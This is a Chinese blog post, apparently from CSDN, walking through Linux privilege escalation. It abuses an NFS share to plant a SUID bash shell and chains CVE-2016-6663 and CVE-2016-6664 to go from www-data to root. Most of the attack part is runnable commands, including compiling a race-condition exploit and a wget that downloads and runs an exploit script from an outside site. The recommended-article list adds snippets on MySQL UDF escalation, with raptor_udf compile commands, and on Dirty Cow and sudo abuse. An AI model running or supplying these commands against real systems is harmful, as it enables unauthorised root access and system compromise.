mysql提权方式linux_Linux提权的几种常用方式

最新推荐文章于 2024-12-14 22:47:57 发布
原创 最新推荐文章于 2024-12-14 22:47:57 发布 · 929 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#mysql提权方式linux

本文详细介绍了Linux系统中通过挂载NFS共享目录实现提权的方法,包括创建本地挂载点,设置权限,并利用shell脚本增强权限。接着,文章探讨了MySQL的提权技巧,特别是针对CVE-2016-6663和CVE-2016-6664两个漏洞的利用,阐述如何从www-data权限提升到mysql权限,再进一步提升到root权限的过程。

sudo showmount -e 10.1.1.233

66b39cefea89699334f2cf28c29bb452.gif

(2)创建本地挂载目录,挂载共享目录。使用

sudo mkdir -p /tmp/data

sudo mount -t nfs 10.1.1.233:/home/bypass /tmp/data

cp /bin/bash /tmp/data/shell

chmod u+s /tmp/data/shell

66b39cefea89699334f2cf28c29bb452.gif

(3)回到要提权的服务器上,使用普通用户使用-p参数来获取root权限。

66b39cefea89699334f2cf28c29bb452.gif

6、MySQL提权

MySQL提权方式有UDF提权,MOF提权,写入启动项提权等方式,但比较有意思的是CVE-2016-6663、CVE-2016-6664组合利用的提取场景,可以将一个www-data权限提升到root权限。

(1)利用CVE-2016-6663将www-data权限提升为mysql权限:

cd /var/www/html/

gcc mysql-privesc-race.c -o mysql-privesc-race -I/usr/include/mysql -lmysqlclient

./mysql-privesc-race test 123456 localhost testdb

(2)利用CVE-2016-6664将Mysql权限提升为root权限:

wget http://legalhackers.com/exploits/CVE-2016-6664/mysql-chowned.sh

chmod 777 mysql-chowned.sh

./mysql-chowned.sh /var/log/mysql/error.log

66b39cefea89699334f2cf28c29bb452.gif

郭逗
关注
Linux几种常用方法
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
11-11 1663
Linux几种常用方法总结:分为6种 1、Linux之内核漏洞 2、Linux之利用SUID 3、Linux之SUDO 4、Linux之计划任务 5、Linux之NFS 6、Linux之利用MySQL 起内核漏洞就不得不到脏牛漏洞(Dirty Cow),是存在时间最长且影响范围最广的漏洞之一。低限用户可以利用该漏洞实现本地,同时可以通过该漏洞实现Docker容器逃逸,获得root限的shell。 本地内核
Linux几种常用姿势
01-11 2万+
在渗透测试过程中,限是非常关键的一步,攻击者往往可以通过利用内核漏洞/限配置不当/root限运行的服务等方式寻找突破点,来达到限的目的。 1、内核漏洞 起内核漏洞就不得不到脏牛漏洞(Dirty Cow),是存在时间最长且影响范围最广的漏洞之一。低限用户可以利用该漏洞实现本地,同时可以通过该漏洞实现Docker容器逃逸,获得root限的shell。 1...
Linux mysql root
12-30 4618
* Usage:  * $ id  * uid=500(raptor) gid=500(raptor) groups=500(raptor)  * $ gcc -g -c raptor_udf.c  * $ gcc -g -shared -W1,-soname,raptor_udf.so -o raptor_udf.so raptor_udf.o -lc  * $ mysql -u ro
Linux利用UDF库实现Mysql
09-10
根据MySQL函数族的可扩展机制,意味着用户可以自己建立包含有自定义函数的动态库来创建自定义函数,简称udf
mysql用户root
11-13
mysql用户rootmysql用户root
linux mysql
weixin_30539835的博客
03-12 400
*Usage:*$id*uid=500(raptor)gid=500(raptor)groups=500(raptor)*$gcc-g-craptor_udf.c*$gcc-g-shared-W1,-soname,raptor_udf.so-oraptor_udf.soraptor_udf.o-lc*$mysql-uroot-p*En...
Linux-70种sudo汇总
LINGX5的博客
08-29 1733
命令有 sudo 的限,我们该如何进行呢?跟着红队笔记大佬,汇总了一下当我们有sudo -l时,70条命令可以的sudo风暴视频连接: https://www.bilibili.com/video/BV1DV4y1U7bT/?
navicat_for_mysql_10.0.11_cn_linux.tar.gz
04-22
总的来说,Navicat for MySQL 10.0.11在Linux环境下的安装过程并不复杂,只需几个简单的命令即可完成。作为一款跨平台的数据库管理工具,它为开发人员和DBA供了极大的便利,帮助他们在不同操作系统下轻松管理MySQL...
Linux几种常用方式
热门推荐
01-04 4万+
在渗透测试过程中,限是非常关键的一步,攻击者往往可以通过利用内核漏洞/限配置不当/root限运行的服务等方式寻找突破点,来达到限的目的。1、内核漏洞起内核漏洞就...
linuxmysql
weixin_30347335的博客
03-18 609
linux,本文为您讲述一种linux方法,这是一种常见的linux技术.. linux系统环境下,mysql以root限登录时 mysql5.x 的linux版本下面有一个函数,可以帮助我们干很多猥琐的事情,这个函数4。x下面貌似没有,原来一直没发现,也没去查函数手册,就我自己的经验来写点东西。4,x的 明天再看看函数手册,再装一个实验一下。 mysql 5.x里面引入了...
Linux--第三方软件MYSQL数据库(WEB+本地)
金灰的博客
05-12 1185
免责声明:本文仅做技术交流与学习,非法搞事后果自负...
mysql拿服务器,Linux利用UDF库实现Mysql
weixin_35834213的博客
03-18 171
环境:os:linux(bt5)database:mysql简述:通过自定义库函数来实现执行任意的程序,这里只在linux下测试通过,具体到windows,所用的dll自然不同。要求:在mysql库下必须有func表,并且在‑‑skip‑grant‑tables开启的情况下,UDF会被禁止;过程: 得到插件库路径 找对应操作系统的udf库文件 利用udf库文件加载函数并执行命令1,得到插件库路径?...
linux——Mysql UDF
qq_55202378的博客
04-12 1107
UDF:user define fucntion,在mysql中,允许用户创建自定义函数,这些函数可以在SQL查询语句中使用,通过使用UDF,用户可以对数据库执行自定义操作。:生成位置无关代码,PIC(Position independent code),这种代码可以在内存中的任何位置执行,简单查看该EXP,在利用过程中,需要登陆到mysql数据库,新建表,在表中插入编译好的共享库,gcc编译的时候,不指定相关参数,直接接源文件,可能会有各种各样的报错。:仅仅编译源代码,不进行链接,通常生成.o文件。
Linuxmysql UDF
waxcj的博客
12-16 2530
linux mysql数据库
Linux精讲(二)Mysql udf
最新发布
Hush78的博客
12-14 1281
其中需要特别注意的是 /usr/lib/mysql/plugin/raptor_udf2.so 文件的路径位置,因为不同版本号的数据库可能路径有不同的差别,因此需要我们特别查询进行文件构造。若secure_file_priv的值被设置为 /var/lib/mysql-files/,则表示只能在指定目录 /var/lib/mysql-files/ 下进行文件的操作。我们可以先利用searchsploite查询mysql udf可利用的文件,我们可以利用其中的 1518.c 文件作为的脚本。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符  | 博主筛选后可见
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值